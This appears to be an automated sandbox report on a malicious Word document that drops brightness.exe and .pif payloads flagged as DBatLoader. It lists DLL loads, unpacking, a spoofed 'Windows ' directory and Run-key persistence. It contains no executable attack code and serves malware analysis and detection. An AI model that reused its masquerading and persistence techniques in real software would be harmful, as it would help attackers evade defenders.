Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830497059.000000007F330000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.000000002061C000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.4.dr
Source:	Binary string: _.pdb source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851940223.0000000021362000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830497059.000000007F330000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851940223.0000000021391000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.000000002061C000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.4.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 10.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 14.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 16.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 10.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 14.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 16.2.npratlsN.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 4.2.brightness.exe.2274618.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.brightness.exe.2274618.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.brightness.exe.28f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1892098003.000000007FD70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1863488781.0000000002274000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: svchost.pif.4.dr

Static PE information: 0xA57E43AD [Tue Dec 25 14:18:21 2057 UTC]

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_02908818 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02908818

Source: initial sample

Static PE information: section where entry point is pointing to: .

Source: Nsltarpn.PIF.4.dr	Static PE information: real checksum: 0x0 should be: 0x163853
Source: NETUTILS.dll.4.dr	Static PE information: real checksum: 0x273f3 should be: 0x26a85
Source: brightness.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x163853

Source: svchost.pif.4.dr	Static PE information: section name: .imrsiv
Source: svchost.pif.4.dr	Static PE information: section name: .didat
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: /4
Source: NETUTILS.dll.4.dr	Static PE information: section name: /19
Source: NETUTILS.dll.4.dr	Static PE information: section name: /31
Source: NETUTILS.dll.4.dr	Static PE information: section name: /45
Source: NETUTILS.dll.4.dr	Static PE information: section name: /57
Source: NETUTILS.dll.4.dr	Static PE information: section name: /70
Source: NETUTILS.dll.4.dr	Static PE information: section name: /81
Source: NETUTILS.dll.4.dr	Static PE information: section name: /92

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291D2FC push 0291D367h; ret	4_2_0291D35F
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F63AE push 028F640Bh; ret	4_2_028F6403
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F63B0 push 028F640Bh; ret	4_2_028F6403
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290F3FC push ecx; mov dword ptr [esp], edx	4_2_0290F401
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F332C push eax; ret	4_2_028F3368
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028FC349 push 8B028FC1h; ret	4_2_028FC34E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291D0AC push 0291D125h; ret	4_2_0291D11D
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290306B push 029030B9h; ret	4_2_029030B1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290306C push 029030B9h; ret	4_2_029030B1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291D1F8 push 0291D288h; ret	4_2_0291D280
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291D144 push 0291D1ECh; ret	4_2_0291D1E4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F6784 push 028F67C6h; ret	4_2_028F67BE
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F6782 push 028F67C6h; ret	4_2_028F67BE
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02908738 push 0290877Ah; ret	4_2_02908772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291C770 push 0291C76Eh; ret	4_2_0291C766
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028FD5A0 push 028FD5CCh; ret	4_2_028FD5C4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0291C550 push 0291C76Eh; ret	4_2_0291C766
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028FC56C push ecx; mov dword ptr [esp], edx	4_2_028FC571
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028FCA4E push 028FCD72h; ret	4_2_028FCD6A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028FCBEC push 028FCD72h; ret	4_2_028FCD6A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02908990 push 029089C8h; ret	4_2_029089C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290A997 push 0290A9D0h; ret	4_2_0290A9C8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290A998 push 0290A9D0h; ret	4_2_0290A9C8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290898E push 029089C8h; ret	4_2_029089C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290790C push 02907989h; ret	4_2_02907981
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02906946 push 029069F3h; ret	4_2_029069EB
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02906948 push 029069F3h; ret	4_2_029069EB
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02905E7C push ecx; mov dword ptr [esp], edx	4_2_02905E7E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02902F60 push 02902FD6h; ret	4_2_02902FCE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_3_2DE306D8 push esp; ret	10_3_2DE3076F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_3_2DE3088D push ebp; retf	10_3_2DE3088F

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\npratlsN.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Nsltarpn.PIF	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Executable created and started: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\npratlsN.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Nsltarpn.PIF	Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nsltarpn			Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nsltarpn			Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_0290A9D4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0290A9D4

Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
